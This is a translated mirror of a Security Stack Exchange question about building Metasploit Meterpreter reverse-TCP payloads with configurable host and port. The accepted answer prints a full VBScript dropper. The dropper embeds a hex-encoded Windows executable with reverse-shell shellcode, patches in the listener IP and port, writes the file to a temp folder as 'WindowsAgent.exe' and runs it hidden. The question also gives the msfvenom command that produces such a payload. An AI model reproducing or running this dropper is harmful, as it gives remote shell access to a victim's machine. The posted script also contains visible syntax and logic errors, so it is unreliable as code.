文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布
社区首页 >问答首页 >具有动态选项的MSFvenom有效载荷

具有动态选项的MSFvenom有效载荷
EN

Security用户
提问于 2017-11-17 05:55:10
回答 3查看 2.2K关注 0票数 0

我正在使用MSFvenom导出计量器的反向TCP有效载荷。虽然这适用于msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.6.131 LPORT=4444 -f -exe > ~/Desktop/shell_meterpreter.exe,但我希望以动态的方式指定LHOSTLPORT

理想情况下,我会将参数直接传递给可执行文件。例如,在命令提示符中运行shell_meterpreter.exe -LHOST 192.168.6.100 -LPORT 1111

有谁知道实现这一目标的方法吗?我试过查看源代码,但没有发现太多的运气。

metasploit
shellcode
meterpreter
EN

回答 3

Security用户

回答已采纳

发布于 2017-11-18 05:43:21

我设法找到了一个对我有用的解决方案。

我在可执行文件的十六进制视图中找到了LPORT和LHOST的变量(见屏幕快照)。

如果有人不愿意接受测试,我编写了一个小的VBS脚本,它可以连接到十六进制代码中。

代码语言:javascript
复制
Function BuildExe(Text) 
    ' Convert the string to hex.
    Set dom = CreateObject("Microsoft.XMLDOM")
    dom.loadXML("<TtB/>")
    dom.documentElement.nodeTypedValue = Text
    dom.documentElement.dataType = "bin.hex"
    exeHex = dom.documentElement.nodeTypedValue

    ' Create the filename and filepath for the executable.
    exeFile = CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "\" & CreateObject("Scripting.FileSystemObject").GetTempName()
    CreateObject("Scripting.FileSystemObject").CreateFolder(exeFile)
    exePath = exeFile & "\" & "WindowsAgent.exe"

    ' Compile and save the executbale.
    Set exeStream = CreateObject("ADODB.Stream")
    exeStream.Type = 1
    exeStream.Open
    exeStream.Write exeHex
    exeStream.SaveToFile exePath, 2

    ' Return the executable filepath.
    BuildExe = exePath
End Function

' Initialize the script.
Log "PAYLOAD", "Payload shell_meterpreter.vbs has been launched."
Execute("lib\includes\build_exe.vbs")

' Set the listener info in hex.
LPORT = Hex("4444")

octets = Split("192.168.6.131"), ".")
For i = 0 To UBound(octets)
    octectTemp = Hex(octets(i))
    If Len(octectTemp) = 1 Then
        octectTemp = 0 & octectTemp
    End If

    If i = 0 Then
        LHOST = octectTemp
    Else
        LHOST = LHOST & octectTemp
    End If
Next

' Build and run Meterpreter.
/*
* 提示:该行代码过长,系统自动注释不进行高亮。一键复制会移除系统注释 
/*
* 提示:该行代码过长,系统自动注释不进行高亮。一键复制会移除系统注释 
* * exePath = BuildExe("4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000C80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000392411DD7D457F8E7D457F8E7D457F8E5A83048E7E457F8E7D457E8E7F457F8E743DEA8E7C457F8E743DEE8E7C457F8E526963687D457F8E0000000000000000000000000000000050450000648603007D3CC64B0000000000000000F00023000B0201000030000000100000000000000040000000100000000000400100000000100000000200000400000000000000040000000000000078420000480200006C34000002000080000010000000000000100000000000000000100000000000001000000000000000000000100000000000000000000000004200006C000000000000000000000000000000000000000000000000000000704200000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000180000000000000000000000000000000000000000000000000000002E746578740000004E100000001000000012000000040000000000000000000000000000200000602E7264617461000084000000003000000002000000160000000000000000000000000000400000402E616F6C6500000078020000004000000004000000180000000000000000000000000000200000E000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004883EC2849C7C14000000049C7C00030000048C7C2001000004833C9E82710000048C7C10010000048BE4110004001000000488BF8F3A4FFD04833C9E8011000005041594C4F41443A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000CCFF25C00F0000FF25B20F000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004E420000000000005E4200000000000000000000000000004030000000000000000000007630000000300000000000000000000000000000000000000000000066300000000000005830000000000000000000000000000005014578697450726F636573730058045669727475616C416C6C6F6300004B45524E454C33322E646C6C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FC4883E4F0E8CC000000415141505251564831D265488B5260488B5218488B5220488B7250480FB74A4A4D31C94831C0AC3C617C022C2041C1C90D4101C1E2ED524151488B52208B423C4801D0668178180B020F85720000008B80880000004885C074674801D0508B4818448B40204901D0E35648FFC9418B34884801D64D31C94831C0AC41C1C90D4101C138E075F14C034C24084539D175D858448B40244901D066418B0C48448B401C4901D0418B04884801D0415841585E595A41584159415A4883EC204152FFE05841595A488B12E94BFFFFFF5D49BE7773325F3332000041564989E64881ECA00100004989E549BC0200" & LPORT & LHOST & "41544989E44C89F141BA4C772607FFD54C89EA68010100005941BA29806B00FFD56A0A415E50504D31C94D31C048FFC04889C248FFC04889C141BAEA0FDFE0FFD54889C76A1041584C89E24889F941BA99A57461FFD585C0740A49FFCE75E5E8930000004883EC104889E24D31C96A0441584889F941BA02D9C85FFFD583F8007E554883C4205E89F66A404159680010000041584889F24831C941BA58A453E5FFD54889C34989C74D31C94989F04889DA4889F941BA02D9C85FFFD583F8007D2858415759680040000041586A005A41BA0B2F0F30FFD5575941BA756E4D61FFD549FFCEE93CFFFFFF4801C34829C64885F675B441FFE7586A005949C7C2F0B5A256FFD500002842000000000000FFFFFFFF404200000030000000000000000000000000000000000000000000004E420000000000005E4200000000000000000000000000004B45524E454C33322E646C6C000058045669727475616C416C6C6F63000005014578697450726F63657373000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
*/
*/
WScript.CreateObject("WScript.Shell").Run "cmd.exe /C start /B cmd /C " & exePath, 0, True
票数 0
EN

Security用户

发布于 2017-11-17 06:58:44

代码语言:javascript
复制
msfvenom -p windows/x64/meterpreter/reverse_tcp **LHOST=192.168.x.x** LPORT=4444 -f -exe

您在这里使用msfvenom来生成代码以实现目标上的反向外壳,一旦生成攻击机器的ip就不会将它传递给它,或者在您的情况下,如果这有意义的话,也不会将其编译为可执行文件。

票数 1
EN

Security用户

发布于 2022-11-16 17:30:54

我会编写一个简单的bash脚本,它允许我快速地动态添加主机和端口,并使用msfvenom生成有效负载。

票数 0
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/173669

复制
相关文章

相似问题

领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 粤公网安备44030502008569号

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档